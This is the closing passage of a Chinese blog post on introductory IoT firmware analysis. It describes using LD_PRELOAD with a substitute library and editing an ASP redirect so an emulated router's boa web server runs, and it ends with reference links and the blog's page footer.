<p>使用 LD_PRELOAD 参数指定劫持 so，这样当 boa 执行到 apmib_init 和 apmib_get 时，就会调用到 apmib-ld.so 里面的函数，从而顺利运行，运行成功的效果如下。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/20.png" srcset="/img/loading.gif" lazyload alt="20"></p>
<p>我们可以看到 Web 服务以跑起来了，80 端口。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/21.png" srcset="/img/loading.gif" lazyload alt="21"></p>
<p>然而当我们打开页面时，页面自动跳转到了 Wizard_Easy_LangSelect.asp，程序又双叒崩溃了。。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/22.png" srcset="/img/loading.gif" lazyload alt="22"></p>
<p>看下该 ASP 文件的代码，通过文件名可以猜测功能是选择页面语言，而它尝试从硬件设备读取语言，显然又会出错了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/23.png" srcset="/img/loading.gif" lazyload alt="23"></p>
<p>那我们就想办法不让它进入这个页面，查看入口网页，发现逻辑是先判断系统语言，成功则直接进入 Webcome 界面。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/24.png" srcset="/img/loading.gif" lazyload alt="24"></p>
<p>所以…我们直接魔改，两种情况都进入 Wizard_Easy_Welcome.asp 界面。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/25.png" srcset="/img/loading.gif" lazyload alt="25"></p>
<p>改完后再次访问，终于成功了，不容易，至此 Web 服务已经成功跑起来了，就可以开始挖洞了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/26.png" srcset="/img/loading.gif" lazyload alt="26"></p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><section class="footnotes"><div class="footnote-list"><ol><li><span id="fn:1" class="footnote-text"><span><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/245945">https://www.anquanke.com/post/id/245945</a>
<a href="#fnref:1" rev="footnote" class="footnote-backref"> ↩</a></span></span></li><li><span id="fn:2" class="footnote-text"><span><a target="_blank" rel="noopener" href="https://github.com/G4rb3n/IoT_Sec_Tutorial">https://github.com/G4rb3n/IoT_Sec_Tutorial</a>
<a href="#fnref:2" rev="footnote" class="footnote-backref"> ↩</a></span></span></li><li><span id="fn:3" class="footnote-text"><span><a target="_blank" rel="noopener" href="https://wokough.gitbook.io/iot-firmware-aio">https://wokough.gitbook.io/iot-firmware-aio</a>
<a href="#fnref:3" rev="footnote" class="footnote-backref"> ↩</a></span></span></li></ol></div></section>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/IOT%E5%AE%89%E5%85%A8/" class="category-chain-item">IOT安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/IOT%E5%AE%89%E5%85%A8/" class="print-no-link">#IOT安全</a>
      
        <a href="/tags/QEMU/" class="print-no-link">#QEMU</a>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="print-no-link">#渗透测试</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>IOT 固件分析入门</div>
      <div>https://k3ppf0r.github.io/2022/12/20/IOT安全/IOT固件分析入门/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>k3ppf0r</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年12月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/01/24/IOT%E5%AE%89%E5%85%A8/%E5%9B%BA%E4%BB%B6%E4%BB%BF%E7%9C%9F%E5%B8%B8%E7%94%A8%E6%89%8B%E6%AE%B5/" title="固件仿真常用手段">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">固件仿真常用手段</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/12/20/IOT%E5%AE%89%E5%85%A8/%E8%93%9D%E7%89%99BLE_GATT%20Profile%20%E7%AE%80%E4%BB%8B(GATT%20%E4%B8%8E%20GAP)/" title="蓝牙BLE: GATT Profile 简介(GATT 与 GAP) ">
                        <span class="hidden-mobile">蓝牙BLE: GATT Profile 简介(GATT 与 GAP) </span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            

          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
